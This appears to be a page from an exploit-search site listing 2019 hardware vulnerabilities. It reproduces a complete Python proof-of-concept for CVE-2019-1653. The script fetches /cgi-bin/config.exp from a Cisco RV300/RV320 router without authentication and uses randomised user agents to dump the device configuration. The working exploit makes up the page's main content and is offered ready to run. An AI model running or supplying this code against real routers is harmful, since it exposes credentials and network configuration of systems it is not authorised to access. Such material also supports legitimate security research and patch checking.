Menu

Improved exploit search engine. Try python and hit enter

"Cisco RV300 / RV320 - Information Disclosure"

Author

"Harom Ramos"

Platform

hardware

Release date

2019-01-28

Release Date Title Type Platform Author
2019-03-08 "Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)" local hardware Specter
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting" webapps hardware Tauco
2019-03-04 "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" webapps hardware JameelNabbo
2019-02-28 "Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow" dos hardware "Artem Metla"
2019-02-22 "Teracue ENC-400 - Command Injection / Missing Authentication" webapps hardware "Stephen Shkardoon"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting" webapps hardware "Bhushan B. Patil"
2019-01-28 "Cisco RV300 / RV320 - Information Disclosure" webapps hardware "Harom Ramos"
2019-01-28 "AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-25 "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection" webapps hardware "RedTeam Pentesting"
2019-01-24 "Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-28 "Sricam gSOAP 2.8 - Denial of Service" dos hardware "Andrew Watson"
2019-01-16 "Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset" webapps hardware "Adithyan AK"
2019-01-16 "GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal" webapps hardware "Pasquale Turi"
2019-01-16 "FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure" webapps hardware "Julio Ureña"
2019-01-14 "Lenovo R2105 - Cross-Site Request Forgery (Command Execution)" webapps hardware "Nathu Nandwani"
2019-01-14 "Across DR-810 ROM-0 - Backup File Disclosure" webapps hardware SajjadBnd
Release Date Title Type Platform Author
2019-01-28 "Cisco RV300 / RV320 - Information Disclosure" webapps hardware "Harom Ramos"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46262/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Exploit Title: 6coRV Exploit
# Date: 01-26-2018
# Exploit Author: Harom Ramos [Horus]
# Tested on: Cisco RV300/RV320
# CVE : CVE-2019-1653

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from fake_useragent import UserAgent

def random_headers():
    return dict({'user-agent': UserAgent().random})

def request(url):
    r = requests.Session()
    try:
        get =  r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False
        if get.status_code == 200:  
            return get.text    
    except requests.ConnectionError:
        return 'Error Conecting'
    except requests.Timeout:
	    return 'Error Timeout'
    except KeyboardInterrupt:
        raise    
    except:
        return 0

print("")        
print("##################################################")
print("CISCO CVE-2019-1653 POC")
print("From H. with love")
print("")

url = raw_input("URL> EX:http://url:port/ ") 
url = url + "/cgi-bin/config.exp"
print(request(url))